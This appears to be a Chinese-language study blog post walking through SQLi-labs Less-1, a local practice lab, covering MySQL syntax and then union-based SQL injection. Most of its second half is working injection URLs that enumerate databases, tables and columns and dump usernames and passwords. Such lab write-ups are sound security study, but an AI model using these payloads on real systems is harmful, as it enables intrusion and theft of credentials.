基于错误_GET_单引号_字符型注入

在打第一关的同时把以前学的零散的Sqli和Mysql的知识做个总结。
参考教程和一航WP。

0x01. 判断字符型/数字型注入

localhost:8088/sqlilabs/Less-1/?id=1
localhost:8088/sqlilabs/Less-1/?id=1'
localhost:8088/sqlilabs/Less-1/?id=1"

在测试以上输入的时候发现第一和第三条的时候页面能正确显示值：

select username,password from table_name where id='$_GET['id']' limit 0,1

这里table_name和limit子句会在后面讲解。

有意思的是，Mysql查询时非常不严格，如下列查询语句都能正确返回结果。但像上面第二条因为多了个单引号导致查询语句没有闭合而报错。在Mysql的交互界面中，没有闭合的引号会一直要求输入直到闭合，但php的界面不会。

select username,password from users where id=1
select username,password from users where id='1'
select username,password from users where id="1"
select username,password from users where id='1"'
select username,password from users where id='1''2'
select username,password from users where id='1"'""

于是测试是否具有注入点：

localhost:8088/sqlilabs/Less-1/?id=-1'OR'1'='1'

发现仍可以显示正确的结果，可以得知这里存在一个注入点。

id=-1很显然是不存在的，但or'1'='1'是一个永真条件（也可以用其他永真条件替代），使查询语句相当于select username,password from users where true即select username,password from users，返回所有结果。

注意：php源码中并未循环输出，所以这里页面上看到的结果正是查询到的第一个结果。

0x02. Mysql语法

order by关键字

select * from table_name order by 3——按第三列（第三个字段）排序
order by column_name asc/desc——升序/逆序

通常利用order by num和回显来判断该表有几个字段：若num=4时报错则说明该表有3个字段。

union操作符

两个查询返回的列数必须相同。
两个select语句对应列所返回的数据类型必须相同（或至少是兼容的）。

通常利用联合查询的特点，使原查询左边为空，使我们定义的查询结果返回出来。

如该表共3个字段，界面显示第2、3个字段，我们便可以构造：
select * from users where id=-1 union select 1,2,3 from users
这里的2,3可以换成任意想要的结果。

limit子句（top子句）

用于规定要返回的记录的数目：
select * from users limit 3——返回前3条
select * from users limit 1,2——返回索引1开始的前2条（索引从0开始）

concat()函数

用于连接字符串：
select concat('11','22','33')——输出"112233"
select concat_ws('-','11','22','33')——输出"11-22-33"，第一个参数是其它参数的分隔符
group_concat(column_name)——将字段的所有数据用,连接作为字符串输出

内置数据库information_schema

系统数据库information_schema数据库中含有很重要的三张表：schemata，tables和columns。

schemata表中存储了Mysql中所有数据库的信息，包括数据库名，编码类型等，show databases的结果取之此表。
tables表有schema_name一个字段，为数据库名。

tables表中存储了Mysql中所有数据库的表的信息（索引根据数据库名），show tables from schema_name的结果取之此表。
tables表有table_name和table_schema两个字段，分别为表名和表所在数据库。

columns表中存储了Mysql中所有表的字段信息，show columns from schema_name.table_name的结果取之此表。
columns表有column_name、table_name和table_schema三个字段，分别为字段名、字段所在表名和表所在数据库。

内置database()函数与select

user()——返回用户名
database()——返回数据库名
version()——返回数据库版本信息
但是没有直接返回表名的函数，所以需要通过其他方式获取表名。

在Mysql中，select就像一个前缀，python中1=1直接返回true，而Mysql则需要select 1=1返回true。
上述内置函数的用法都是select user()等，之上concat()函数同样如此。

0x03. 获取库名、表名、字段

在0x01中我们已经找到了注入点，接下来是利用order by和union找出显示的是哪几个字段。

http://localhost:8088/sqlilabs/Less-1/?id=1' order by 4--+

http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,2,3--+

显示的是2和3，所以username和password对应该表的第2和第3个字段。

步骤1：爆用户名和数据库

http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,2,concat_ws('-',user(),database())--+
http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,user(),database()--+

步骤2：爆表名

http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,2,table_name from information_schema.tables where table_schema='security'--+

http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,2,table_name from information_schema.tables where table_schema='security' limit 3,1--+

步骤3：爆字段

http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,2,column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1--+

0x04. 获取你想要的

使用获得的表名和字段和limit依次获取：

http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,2,concat_ws('-',id,username,password) from users limit 7,1--+

http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

爆字段：

http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+

爆数据：

http://localhost:8088/sqlilabs/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from users--+

0x05. 吐槽

从这篇开始不再使用缩进…实在是太麻烦了，段落用空行隔开。
终于写完了…Markdown用熟练了确实非常快，比Word好用多了。
一晚上做了第一关和复习，把以前的很多记不清的都复习了一遍，终于对Sqli的大概过程有了认识。
在图书馆被冻死，回来之后热死。
手机放桌上被热水浇了mmmmp。